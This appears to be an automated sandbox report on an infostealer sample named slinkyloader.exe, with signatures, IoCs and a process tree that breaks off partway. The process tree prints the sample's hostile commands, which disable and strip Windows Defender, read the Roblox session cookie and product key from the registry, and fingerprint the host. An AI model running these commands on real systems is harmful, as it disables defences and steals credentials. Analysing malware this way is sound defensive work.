b23f7797a193606d9e048d3918f617c395b29fce757667ef10606b5a5c326a2b

Analysis

max time kernel
154s
max time network
212s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
08-11-2024 13:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

slinkyloader.exe
Size

24.3MB
MD5

916f9a50e4219d05f64b9376851cb94b
SHA1

ee077b680b175fe4d169ee8e6bff09ceecb84b4c
SHA256

21d15ef5aac5499e0d3169a98fa97f0baed23f4a98d439819025ba3a5af96a4f
SHA512

a33bf381ff57a97a56fa169814232fccd8fcf2741a260fed1929743d39ab337aa7b28b56a19554bde012188ca0582c4cdacb74738f1f67a3180dc37eaf8215af
SSDEEP

786432:orEGs1OEi/UMnspKXk8BEWL11JDjszSljW2a3:D1Ob8YXvJv1Yz13

Score

10^/10

credential_access discovery evasion execution spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
4368	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3320	powershell.exe
4496	powershell.exe
1036	powershell.exe
2504	powershell.exe
2868	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2220	bound.exe
5108	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
4912	slinkyloader.exe
2220	bound.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1316	tasklist.exe
4064	tasklist.exe

UPX packed file 53 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x002800000004510c-22.dat	upx
behavioral1/memory/4912-26-0x00007FFCBF730000-0x00007FFCBFD19000-memory.dmp	upx
behavioral1/files/0x00280000000450e4-28.dat	upx
behavioral1/files/0x0031000000045104-32.dat	upx
behavioral1/memory/4912-33-0x00007FFCD8390000-0x00007FFCD839F000-memory.dmp	upx
behavioral1/memory/4912-31-0x00007FFCCF0C0000-0x00007FFCCF0E3000-memory.dmp	upx
behavioral1/files/0x00280000000450e7-46.dat	upx
behavioral1/files/0x00280000000450e6-45.dat	upx
behavioral1/files/0x00280000000450eb-50.dat	upx
behavioral1/files/0x00280000000450ea-49.dat	upx
behavioral1/files/0x00280000000450e9-48.dat	upx
behavioral1/files/0x00280000000450e8-47.dat	upx
behavioral1/files/0x00280000000450e5-44.dat	upx
behavioral1/files/0x00280000000450e3-43.dat	upx
behavioral1/files/0x0028000000045117-42.dat	upx
behavioral1/files/0x0028000000045116-41.dat	upx
behavioral1/files/0x0028000000045113-40.dat	upx
behavioral1/files/0x0024000000045106-37.dat	upx
behavioral1/files/0x002a0000000450f8-36.dat	upx
behavioral1/memory/4912-56-0x00007FFCCEEB0000-0x00007FFCCEEDD000-memory.dmp	upx
behavioral1/memory/4912-61-0x00007FFCBEDC0000-0x00007FFCBEF37000-memory.dmp	upx
behavioral1/memory/4912-62-0x00007FFCC8260000-0x00007FFCC8283000-memory.dmp	upx
behavioral1/memory/4912-60-0x00007FFCCEC10000-0x00007FFCCEC29000-memory.dmp	upx
behavioral1/memory/4912-64-0x00007FFCC8240000-0x00007FFCC8259000-memory.dmp	upx
behavioral1/memory/4912-66-0x00007FFCD5EE0000-0x00007FFCD5EED000-memory.dmp	upx
behavioral1/memory/4912-68-0x00007FFCC8050000-0x00007FFCC807E000-memory.dmp	upx
behavioral1/memory/4912-75-0x00007FFCBE980000-0x00007FFCBECF8000-memory.dmp	upx
behavioral1/memory/4912-73-0x00007FFCBED00000-0x00007FFCBEDB8000-memory.dmp	upx
behavioral1/memory/4912-72-0x00007FFCBF730000-0x00007FFCBFD19000-memory.dmp	upx
behavioral1/memory/4912-80-0x00007FFCD5ED0000-0x00007FFCD5EDD000-memory.dmp	upx
behavioral1/memory/4912-78-0x00007FFCC8090000-0x00007FFCC80A4000-memory.dmp	upx
behavioral1/memory/4912-77-0x00007FFCCF0C0000-0x00007FFCCF0E3000-memory.dmp	upx
behavioral1/memory/4912-83-0x00007FFCBF610000-0x00007FFCBF72C000-memory.dmp	upx
behavioral1/memory/4912-118-0x00007FFCBEDC0000-0x00007FFCBEF37000-memory.dmp	upx
behavioral1/memory/4912-148-0x00007FFCC8260000-0x00007FFCC8283000-memory.dmp	upx
behavioral1/memory/4912-165-0x00007FFCC8240000-0x00007FFCC8259000-memory.dmp	upx
behavioral1/memory/4912-195-0x00007FFCC8050000-0x00007FFCC807E000-memory.dmp	upx
behavioral1/memory/4912-218-0x00007FFCBED00000-0x00007FFCBEDB8000-memory.dmp	upx
behavioral1/memory/4912-238-0x00007FFCBED00000-0x00007FFCBEDB8000-memory.dmp	upx
behavioral1/memory/4912-237-0x00007FFCC8050000-0x00007FFCC807E000-memory.dmp	upx
behavioral1/memory/4912-236-0x00007FFCD5EE0000-0x00007FFCD5EED000-memory.dmp	upx
behavioral1/memory/4912-235-0x00007FFCC8240000-0x00007FFCC8259000-memory.dmp	upx
behavioral1/memory/4912-234-0x00007FFCBF610000-0x00007FFCBF72C000-memory.dmp	upx
behavioral1/memory/4912-233-0x00007FFCD5ED0000-0x00007FFCD5EDD000-memory.dmp	upx
behavioral1/memory/4912-232-0x00007FFCC8090000-0x00007FFCC80A4000-memory.dmp	upx
behavioral1/memory/4912-231-0x00007FFCBE980000-0x00007FFCBECF8000-memory.dmp	upx
behavioral1/memory/4912-229-0x00007FFCBEDC0000-0x00007FFCBEF37000-memory.dmp	upx
behavioral1/memory/4912-228-0x00007FFCCEC10000-0x00007FFCCEC29000-memory.dmp	upx
behavioral1/memory/4912-227-0x00007FFCCEEB0000-0x00007FFCCEEDD000-memory.dmp	upx
behavioral1/memory/4912-226-0x00007FFCD8390000-0x00007FFCD839F000-memory.dmp	upx
behavioral1/memory/4912-225-0x00007FFCCF0C0000-0x00007FFCCF0E3000-memory.dmp	upx
behavioral1/memory/4912-224-0x00007FFCC8260000-0x00007FFCC8283000-memory.dmp	upx
behavioral1/memory/4912-208-0x00007FFCBF730000-0x00007FFCBFD19000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
956	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
2504	powershell.exe
2868	powershell.exe
3320	powershell.exe
3320	powershell.exe
2868	powershell.exe
2868	powershell.exe
3320	powershell.exe
2504	powershell.exe
2504	powershell.exe
2220	bound.exe
2220	bound.exe
4496	powershell.exe
2220	bound.exe
2220	bound.exe
4496	powershell.exe
4980	powershell.exe
4980	powershell.exe
2220	bound.exe
2220	bound.exe
2716	WMIC.exe
2716	WMIC.exe
2716	WMIC.exe
2716	WMIC.exe
2760	WMIC.exe
2760	WMIC.exe
2760	WMIC.exe
2760	WMIC.exe
5040	WMIC.exe
5040	WMIC.exe
5040	WMIC.exe
5040	WMIC.exe
1036	powershell.exe
1036	powershell.exe
2220	bound.exe
2220	bound.exe
956	WMIC.exe
956	WMIC.exe
956	WMIC.exe
956	WMIC.exe
2676	powershell.exe
2676	powershell.exe
2220	bound.exe
2220	bound.exe
2220	bound.exe
2220	bound.exe
2220	bound.exe
2220	bound.exe
2220	bound.exe
2220	bound.exe
2220	bound.exe
2220	bound.exe
2220	bound.exe
2220	bound.exe
6120	msedge.exe
6120	msedge.exe
6048	msedge.exe
6048	msedge.exe
6048	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
6048	msedge.exe
6048	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1316	tasklist.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	4064	tasklist.exe
Token: SeDebugPrivilege	3320	powershell.exe
Token: SeIncreaseQuotaPrivilege	3320	powershell.exe
Token: SeSecurityPrivilege	3320	powershell.exe
Token: SeTakeOwnershipPrivilege	3320	powershell.exe
Token: SeLoadDriverPrivilege	3320	powershell.exe
Token: SeSystemProfilePrivilege	3320	powershell.exe
Token: SeSystemtimePrivilege	3320	powershell.exe
Token: SeProfSingleProcessPrivilege	3320	powershell.exe
Token: SeIncBasePriorityPrivilege	3320	powershell.exe
Token: SeCreatePagefilePrivilege	3320	powershell.exe
Token: SeBackupPrivilege	3320	powershell.exe
Token: SeRestorePrivilege	3320	powershell.exe
Token: SeShutdownPrivilege	3320	powershell.exe
Token: SeDebugPrivilege	3320	powershell.exe
Token: SeSystemEnvironmentPrivilege	3320	powershell.exe
Token: SeRemoteShutdownPrivilege	3320	powershell.exe
Token: SeUndockPrivilege	3320	powershell.exe
Token: SeManageVolumePrivilege	3320	powershell.exe
Token: 33	3320	powershell.exe
Token: 34	3320	powershell.exe
Token: 35	3320	powershell.exe
Token: 36	3320	powershell.exe
Token: SeIncreaseQuotaPrivilege	2504	powershell.exe
Token: SeSecurityPrivilege	2504	powershell.exe
Token: SeTakeOwnershipPrivilege	2504	powershell.exe
Token: SeLoadDriverPrivilege	2504	powershell.exe
Token: SeSystemProfilePrivilege	2504	powershell.exe
Token: SeSystemtimePrivilege	2504	powershell.exe
Token: SeProfSingleProcessPrivilege	2504	powershell.exe
Token: SeIncBasePriorityPrivilege	2504	powershell.exe
Token: SeCreatePagefilePrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeRestorePrivilege	2504	powershell.exe
Token: SeShutdownPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeSystemEnvironmentPrivilege	2504	powershell.exe
Token: SeRemoteShutdownPrivilege	2504	powershell.exe
Token: SeUndockPrivilege	2504	powershell.exe
Token: SeManageVolumePrivilege	2504	powershell.exe
Token: 33	2504	powershell.exe
Token: 34	2504	powershell.exe
Token: 35	2504	powershell.exe
Token: 36	2504	powershell.exe
Token: SeIncreaseQuotaPrivilege	2868	powershell.exe
Token: SeSecurityPrivilege	2868	powershell.exe
Token: SeTakeOwnershipPrivilege	2868	powershell.exe
Token: SeLoadDriverPrivilege	2868	powershell.exe
Token: SeSystemProfilePrivilege	2868	powershell.exe
Token: SeSystemtimePrivilege	2868	powershell.exe
Token: SeProfSingleProcessPrivilege	2868	powershell.exe
Token: SeIncBasePriorityPrivilege	2868	powershell.exe
Token: SeCreatePagefilePrivilege	2868	powershell.exe
Token: SeBackupPrivilege	2868	powershell.exe
Token: SeRestorePrivilege	2868	powershell.exe
Token: SeShutdownPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeSystemEnvironmentPrivilege	2868	powershell.exe
Token: SeRemoteShutdownPrivilege	2868	powershell.exe
Token: SeUndockPrivilege	2868	powershell.exe
Token: SeManageVolumePrivilege	2868	powershell.exe

Suspicious use of FindShellTrayWindow 24 IoCs

pid	Process
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
6048	msedge.exe
6048	msedge.exe
6048	msedge.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1744	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2548 wrote to memory of 4912	2548	slinkyloader.exe	82
PID 2548 wrote to memory of 4912	2548	slinkyloader.exe	82
PID 4912 wrote to memory of 3084	4912	slinkyloader.exe	84
PID 4912 wrote to memory of 3084	4912	slinkyloader.exe	84
PID 4912 wrote to memory of 4728	4912	slinkyloader.exe	85
PID 4912 wrote to memory of 4728	4912	slinkyloader.exe	85
PID 4912 wrote to memory of 4604	4912	slinkyloader.exe	88
PID 4912 wrote to memory of 4604	4912	slinkyloader.exe	88
PID 4912 wrote to memory of 884	4912	slinkyloader.exe	89
PID 4912 wrote to memory of 884	4912	slinkyloader.exe	89
PID 4912 wrote to memory of 4876	4912	slinkyloader.exe	92
PID 4912 wrote to memory of 4876	4912	slinkyloader.exe	92
PID 4912 wrote to memory of 2268	4912	slinkyloader.exe	93
PID 4912 wrote to memory of 2268	4912	slinkyloader.exe	93
PID 3084 wrote to memory of 2504	3084	cmd.exe	96
PID 3084 wrote to memory of 2504	3084	cmd.exe	96
PID 2268 wrote to memory of 1316	2268	cmd.exe	97
PID 2268 wrote to memory of 1316	2268	cmd.exe	97
PID 4604 wrote to memory of 2868	4604	cmd.exe	98
PID 4604 wrote to memory of 2868	4604	cmd.exe	98
PID 4728 wrote to memory of 3320	4728	cmd.exe	99
PID 4728 wrote to memory of 3320	4728	cmd.exe	99
PID 4876 wrote to memory of 4064	4876	cmd.exe	101
PID 4876 wrote to memory of 4064	4876	cmd.exe	101
PID 884 wrote to memory of 2220	884	cmd.exe	100
PID 884 wrote to memory of 2220	884	cmd.exe	100
PID 4912 wrote to memory of 2540	4912	slinkyloader.exe	105
PID 4912 wrote to memory of 2540	4912	slinkyloader.exe	105
PID 2540 wrote to memory of 4496	2540	cmd.exe	109
PID 2540 wrote to memory of 4496	2540	cmd.exe	109
PID 4912 wrote to memory of 1492	4912	slinkyloader.exe	110
PID 4912 wrote to memory of 1492	4912	slinkyloader.exe	110
PID 1492 wrote to memory of 4980	1492	cmd.exe	112
PID 1492 wrote to memory of 4980	1492	cmd.exe	112
PID 4728 wrote to memory of 4368	4728	cmd.exe	114
PID 4728 wrote to memory of 4368	4728	cmd.exe	114
PID 4912 wrote to memory of 4052	4912	slinkyloader.exe	115
PID 4912 wrote to memory of 4052	4912	slinkyloader.exe	115
PID 4052 wrote to memory of 5108	4052	cmd.exe	117
PID 4052 wrote to memory of 5108	4052	cmd.exe	117
PID 4912 wrote to memory of 3464	4912	slinkyloader.exe	118
PID 4912 wrote to memory of 3464	4912	slinkyloader.exe	118
PID 3464 wrote to memory of 2716	3464	cmd.exe	120
PID 3464 wrote to memory of 2716	3464	cmd.exe	120
PID 4912 wrote to memory of 4056	4912	slinkyloader.exe	121
PID 4912 wrote to memory of 4056	4912	slinkyloader.exe	121
PID 4056 wrote to memory of 2760	4056	cmd.exe	123
PID 4056 wrote to memory of 2760	4056	cmd.exe	123
PID 4912 wrote to memory of 4684	4912	slinkyloader.exe	124
PID 4912 wrote to memory of 4684	4912	slinkyloader.exe	124
PID 4684 wrote to memory of 5040	4684	cmd.exe	126
PID 4684 wrote to memory of 5040	4684	cmd.exe	126
PID 4912 wrote to memory of 4724	4912	slinkyloader.exe	127
PID 4912 wrote to memory of 4724	4912	slinkyloader.exe	127
PID 4724 wrote to memory of 1036	4724	cmd.exe	129
PID 4724 wrote to memory of 1036	4724	cmd.exe	129
PID 4912 wrote to memory of 2068	4912	slinkyloader.exe	130
PID 4912 wrote to memory of 2068	4912	slinkyloader.exe	130
PID 2068 wrote to memory of 956	2068	cmd.exe	132
PID 2068 wrote to memory of 956	2068	cmd.exe	132
PID 4912 wrote to memory of 4672	4912	slinkyloader.exe	133
PID 4912 wrote to memory of 4672	4912	slinkyloader.exe	133
PID 4672 wrote to memory of 2676	4672	cmd.exe	135
PID 4672 wrote to memory of 2676	4672	cmd.exe	135

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
"C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2548
- C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
  "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3320
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2268
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI25482\rar.exe a -r -hp"0132" "C:\Users\Admin\AppData\Local\Temp\XDXUu.zip" *"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4052
  - - C:\Users\Admin\AppData\Local\Temp\_MEI25482\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI25482\rar.exe a -r -hp"0132" "C:\Users\Admin\AppData\Local\Temp\XDXUu.zip" *
      4⤵
      Executes dropped EXE
      PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2676

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:1580
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:1744
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1948 -parentBuildID 20240401114208 -prefsHandle 1872 -prefMapHandle 1860 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {538c6c86-c5d8-4235-a86f-fe795ddde5d4} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" gpu
    3⤵
    PID:4380
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2376 -parentBuildID 20240401114208 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82153c0a-7bd1-4c7b-9fd2-38496a171f19} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" socket
    3⤵
    - Checks processor information in registry
    PID:1648
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3044 -childID 1 -isForBrowser -prefsHandle 3048 -prefMapHandle 3260 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c5efd55a-5dc2-4ce4-9f9f-f978d8250e93} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab
    3⤵
    PID:5100
- - C:\Program Files\Mozilla Firefox\firefox.exe
